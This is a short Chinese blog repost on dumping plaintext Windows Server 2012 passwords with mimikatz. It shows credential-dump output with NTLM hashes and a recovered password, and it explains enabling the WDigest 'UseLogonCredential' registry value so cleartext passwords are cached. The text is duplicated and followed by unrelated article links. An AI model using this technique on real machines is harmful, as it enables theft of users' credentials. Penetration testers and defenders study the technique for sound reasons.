windows 2012 抓明文密码方法
2016-04-12 14:31
711 查看
windows 2012 抓明文密码方法
默认配置是抓不到明文密码了,神器mimikatz显示Password为null
Authentication
Id
:
0
;
121279
(00000000:0001d9bf)
Session
:
Interactive
from
1
User
Name
: mickey
Domain
: WIN-B054LAOH5FC
Logon
Server
: WIN-B054LAOH5FC
Logon
Time
:
2014/2/7
16:13:37
SID : S-1-5-21-3697557613-2315859964-140861748-1001
msv :
[00000003]
Primary
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
[00010000]
CredentialKeys
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
tspkg :
wdigest :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
(null)
kerberos :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
(null)
ssp : KO
credman :
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。
Authentication
Id
:
0
;
2506062
(00000000:00263d4e)
Session
:
Interactive
from
2
User
Name
: mickey
Domain
: WIN-B054LAOH5FC
Logon
Server
: WIN-B054LAOH5FC
Logon
Time
:
2015/5/11
11:47:35
SID : S-1-5-21-3697557613-2315859964-140861748-1001
msv :
[00010000]
CredentialKeys
* NTLM : ad12521316a18d2172f20db07674c278
* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c
[00000003]
Primary
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
* NTLM : ad12521316a18d2172f20db07674c278
* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c
tspkg :
wdigest :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
AGeisNBVeryNB@wooyun.org
参考链接:http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
[原文地址]
默认配置是抓不到明文密码了,神器mimikatz显示Password为null
Authentication
Id
:
0
;
121279
(00000000:0001d9bf)
Session
:
Interactive
from
1
User
Name
: mickey
Domain
: WIN-B054LAOH5FC
Logon
Server
: WIN-B054LAOH5FC
Logon
Time
:
2014/2/7
16:13:37
SID : S-1-5-21-3697557613-2315859964-140861748-1001
msv :
[00000003]
Primary
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
[00010000]
CredentialKeys
* NTLM :
31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
tspkg :
wdigest :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
(null)
kerberos :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
(null)
ssp : KO
credman :
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。
Authentication
Id
:
0
;
2506062
(00000000:00263d4e)
Session
:
Interactive
from
2
User
Name
: mickey
Domain
: WIN-B054LAOH5FC
Logon
Server
: WIN-B054LAOH5FC
Logon
Time
:
2015/5/11
11:47:35
SID : S-1-5-21-3697557613-2315859964-140861748-1001
msv :
[00010000]
CredentialKeys
* NTLM : ad12521316a18d2172f20db07674c278
* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c
[00000003]
Primary
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
* NTLM : ad12521316a18d2172f20db07674c278
* SHA1 :
85b6b322a966fe19f758ee15fd7516c23c33cb7c
tspkg :
wdigest :
*
Username
: mickey
*
Domain
: WIN-B054LAOH5FC
*
Password
:
AGeisNBVeryNB@wooyun.org
参考链接:http://www.labofapenetrationtester.com/2015/05/dumping-passwords-in-plain-on-windows-8-1.html
[原文地址]
相关文章推荐
- IDEA中以最简单方式实现实现Jrebel热部署
- JAVA如何抛出异常
- 线程、多线程与线程池基础
- HTML 5 Canvas
- 高通平台常用缩写
- Cocos2d-JS Sprite精灵类
- LeetCode 35 -Search Insert Position ( JAVA )
- iOS--UILabel上画横线
- 博弈论 随记(SG函数)
- a,b=b,a+b 与 a=b,b=a+b
- Lldb篇2 chisel来提高调试效率
- ztree设置节点checked,选中某节点等相关操作
- 文件上传
- iOS--UILabel上画横线
- Android App调用MediaRecorder实现录音功能的实例
- opencv打开matlab保存的txt文件,并赋值为Mat矩阵
- 学习JAVA中RSA算法实现
- ruby中星号(*)的功用
- iOS应用程序的生命周期
- the difference between min SDK version/target SDK version vs. compile SDK version?